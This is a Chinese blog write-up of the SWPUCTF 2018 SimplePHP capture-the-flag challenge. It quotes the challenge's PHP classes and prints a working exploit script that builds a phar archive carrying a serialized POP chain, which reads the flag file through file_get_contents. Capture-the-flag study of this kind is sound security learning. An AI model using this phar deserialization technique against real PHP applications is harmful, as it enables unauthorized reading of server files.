[SWPUCTF 2018]SimplePHP

最新推荐文章于 2023-05-21 08:34:32 发布
最新推荐文章于 2023-05-21 08:34:32 发布
阅读量300 收藏
点赞数
文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50613938/article/details/122093914
版权

第一个点先找到文件,我们找找file.php
在这里插入图片描述

发现function.php和class.php
进去发现
在这里插入图片描述

发现提示
在这里插入图片描述

进入class.php,发现源码了
在这里插入图片描述

class C1e4r
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = $name;
    }
    public function __destruct()
    {
        $this->test = $this->str;
        echo $this->test;
    }
}

这里面能利用到的是哪个销毁的魔术方法,会在结束的时候echo,这时候就能调用到

class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source = $file;   //$this->source = phar://phar.jpg
        echo $this->source;
    }
    public function __toString()
    {
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}

这个调用变量的操作可以在接下来直接到后面进行对get的调用,所以后面的时候会把这个访问的变量=test来调用方法,而这里要调用我们要尽行的tostring方法就需要echo,就是上面cle4r的方法,那么接下来我们调用的方向就是给上面作为echo的那里赋值目标路径地址,就是我们要进行的/var/www/html/f1ag.php

class Test
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->get($key);
    }
    public function get($key)
    {
        if(isset($this->params[$key])) {
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }
    public function file_get($value)
    {
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
?>

看见了base64读取文件就可以知道我们的方向了,那现在就是问题怎么调用_get,我们就需要show里面访问变量的操作了,
整个pop链就是C1e4r::destruct() -> Show::toString() -> Test::__get()

然后上传的时候会对htaccess和后缀进行验证,记得要改在这里插入图片描述
这样就构造exp

<?php
class C1e4r
{
    public $test;
    public $str;
}

class Show
{
    public $source;
    public $str;
}
class Test
{
    public $file;
    public $params;

}

$a = new C1e4r();
$b = new Show();
$c = new Test();
$c->params['source'] = "/var/www/html/f1ag.php";//目标文件
$a->str = $b;   //触发__tostring,#a的方法变量在show里面触发,执行了tostring,
$b->str['str'] = $c;  //触发__get;#之后b的方法变量在test里面调用了get方法
#整个pop链就是C1e4r::destruct() -> Show::toString() -> Test::__get()


$phar = new Phar("exp.phar"); //生成phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($a); //触发头是C1e4r类
$phar->addFromString("exp.txt", "test"); //生成签名
$phar->stopBuffering();
#上面那块也可以是下面这块,更好理解
	$c = new C1e4r();
	$show = new Show();
	$test= new Test();
	$test->params['source'] = "/var/www/html/f1ag.php";
	$c->str = $show;
	$show->str['str'] = $test;

?>

在这里插入图片描述

然后通过生成phar文件的方式来生成上传
上传之后找到目标文件的地址就能读取目标了
Apache环境直接开始就行

落夜雨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2018]SimplePHP 一道phar反序列化和pop链的题目
weixin_73560599的博客
08-02 138
此题考查pop链 phar反序列化 知道phar反序列化的概念,怎么生成phar文件以及受影响的函数和pop链的构造即可
[SWPUCTF 2018]SimplePHP_wp
lzu_lfl的博客
11-11 263
pop链,phar反序列化
simplePHP轻量级
01-21
simplePHP PHP轻量级框架
simplePHP Scripts-开源
05-01
simplePHP脚本允许您使用不带数据库的常见php脚本,使用.dat和.txt文件存储数据。
simplephp:使一切变得简单
02-14
simplephp:使一切变得简单
simplePHP-curl:源自 Codeigniter-cURL 的 Simpe PHP cURL 库
06-13
您可以使用更好、经过充分测试和开发的 cURL 库。...简单调用这些都在一行代码中完成,让生活变得轻松。 他们返回页面的正文,或者在失败时返回 FALSE。...// Simple call to CI URI$curl->simple_post('controller/method...
java企业oa源码-SimplePHP:简洁明了PHP框架,全面支持php5.3+
06-05
当前状态: 这是一个简单明了的框架,专为 ...设计,具有完整的 OOP 支持。 ... 但是几乎所有的 ...兼容,所以我不能使用命名空间来管理类(实际上命名空间在这些框架中没有用)。...因此,我决定编写一个新框架来满足我的需求。...
[SWPUCTF 2018]SimplePHP--一道简单的Phar反序列化题目
Dream'
06-16 934
题目就不贴了,直接给出利用链①:echo会触发__toString魔术方法,所以这里的$this->test应该是Show类实例化的对象show②:这里应该使$this->str['str']为Test类实例化后的对象test,然后test->source会触发__get魔术方法(因为Test类没有名为source的成员变量,所以会触发get魔术方法,并且$key=source)③④:调用get方法,$...
BUUCTF [SWPUCTF 2018]SimplePHP
weixin_45441024的博客
12-01 1162
BUUCTF [SWPUCTF 2018]SimplePHP 打开题目我们很明显的看到了上传文件的板块和查看文件的板块,选择这个上传文件,显示如图 我们再选择查看文件的板块,url如图所示 我们在’='后面输入我们想要查看的文件,发现直接就给打印出来了,之后我们根据这个查看了几个php文件,得到了如下内容: file.php: <?php header("content-type:text/html;charset=utf-8"); include 'function.php'; inc
phar反序列化学习SWPUCTF2018 SimplePHP
qq_61142406的博客
05-26 188
https://xz.aliyun.com/t/3692#toc-13 <?php class C1e4r { public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() { $this->test = $this->str;
攻防世界之simple_php(web简单)
my_name_is_sy的博客
05-26 2791
这一题考的是php语言中“==”的知识点,它仅仅表示数值想等。
【网络安全 | CTF】攻防世界 simple_php 解题详析
最新发布
等风来
05-21 5045
恒等比较运算符是一个严格比较,它不仅比较变量的值,还比较变量的数据类型和内存地址。当使用恒等比较运算符比较两个变量时,如果它们的值和数据类型都相等,则返回 true。比较运算符是一个松散比较,它只比较变量的值,而不考虑变量的数据类型。当比较两个变量时,如果它们的值相等,则返回 true。5.对于两个操作数都是字符串的情况,PHP会将两个字符串中的非数字字符删除,然后将剩余的数字字符串转换为相应的数字进行比较。如果变量b的值大于1234,则输出变量flag2的值。如果变量b是一个数字,则终止程序的执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值